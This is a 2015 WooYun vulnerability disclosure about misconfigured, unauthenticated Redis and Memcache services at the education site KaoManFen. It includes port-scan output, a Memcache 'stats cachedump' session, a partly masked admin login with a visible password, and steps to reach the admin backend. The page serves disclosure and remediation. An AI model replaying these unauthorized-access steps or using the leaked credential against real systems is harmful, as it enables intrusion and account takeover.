当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145846

漏洞标题:考满分服务配置不严导致信息泄露

相关厂商:考满分

漏洞作者: 影刺

提交时间:2015-10-12 09:38

修复时间:2015-11-30 15:10

公开时间:2015-11-30 15:10

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

RT

详细说明:

Memcache和redis服务配置不严导致信息泄露,地址:
http://**.**.**.**、http://**.**.**.**,IP分别为:**.**.**.**
和**.**.**.**:
首先是Redis 通过对**.**.**.**扫描,发现开放了6379(Redis)

正在扫描: **.**.**.**
[端口] | [说明]
80 全球信息网超文本传输协议(www)
22 SSH远程登录协议
3341 3341 号端口
6379 6379 号端口
11211 11211 号端口


使用连接工具连接:

redis.png


获取有用信息是利用的Memcache服务未授权:

root@kali:~# telnet **.**.**.** 11211
Trying **.**.**.**...
Connected to **.**.**.**.
Escape character is '^]'.
stats cachedump 13 0
.ITEM 2fd490b017eae8d350f8a95e1fca2647 [1258 b; 1444466119 s]
ITEM 038b6eab379cb94894f019a6f2abb9a8 [1227 b; 1444466119 s]
ITEM 56043a70e3dd85deae98b1e1eca0b716 [1266 b; 1444466118 s]
ITEM 2bb543a3715370e69126fc1a91118b00 [1220 b; 1444466118 s]
ITEM 9b353cfb84f664ca8a958d6f03ba5764 [1194 b; 1444466118 s]
ITEM c15f61e5a76c029ea0d80abfad475389 [1334 b; 1444466118 s]
ITEM 9310f0fb1608bd1062a626270a8092b6 [1286 b; 1444466118 s]
ITEM cffdfd3a22b52dcb42044c5b1e38e829 [1209 b; 1444466117 s]
ITEM 72602ffd533feff2410d7a047315cac9 [1282 b; 1444466117 s]
ITEM b67ca864af7da1d816e04adae58e6c0c [1289 b; 1444466117 s]
ITEM ff79d706bb6c6624eff8114182b52d48 [1216 b; 1444466117 s]
ITEM af00ebe57abff633aa0d7d2db275a6e6 [1208 b; 1444466116 s]
ITEM f00156c0934f9f328eb40358264d0a7f [1237 b; 1444466116 s]
ITEM 566b83d34072259293afd3064a702b90 [1280 b; 1444466116 s]
ITEM a158ccba834390210ae7fdd5f767535b [1280 b; 1444466116 s]
ITEM 05b26a2109059dde9d11c51adcac27bc [1246 b; 1444466116 s]
ITEM 98dd2f2ae9c0148420d7ff6e2dcec874 [1244 b; 1444466115 s]
ITEM 345b68177d57b358996229ecf4bba63a [1228 b; 1444466115 s]
ITEM 2f4363893eea84e47ecb7e61493eb503 [1259 b; 1444466115 s]
ITEM 577c9ce2bd5dc44dc8a780cb954c6543 [1210 b; 1444466115 s]
ITEM 1aaf5489d2801edde63200475eb4dfa7 [1305 b; 1444466114 s]
ITEM e978d3016c29ce4da028565ae905f13c [1293 b; 1444466114 s]
ITEM 450095190ba517e4b64c924b3bb28cfb [1272 b; 1444466114 s]
ITEM 92996b12b0ab1105c80ad887624ca206 [1210 b; 1444466113 s]
ITEM b435a06ce61c466f09b7a30f35009268 [1275 b; 1444466113 s]
ITEM 385c516a847ecab9eb3676c1d17e7c44 [1193 b; 1444466113 s]


数据.png


通过上图的密码解密出来登陆提示密码错误,推测密码不是这个字段,下面找到一个可以登陆的
用户名赵行者,是管理员:

数据1.jpg


解密.png


根据邮箱和密码5706*****@**.**.**.**、kmf123456登陆,提示成功:

登陆.png


有奖学金貌似可以提现。。。

充值.jpg


比例是1000币:100RMB,然后url后跟admin跳入后台界面:

后台.jpg


管理员.png

漏洞证明:

数据1.jpg


解密.png


登陆.png


后台.jpg


管理员.png

修复方案:

访问控制

版权声明:转载请注明来源 影刺@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-16 15:08

厂商回复:

暂未建立与网站管理单位的直接处置渠道,待认领.

最新状态:

暂无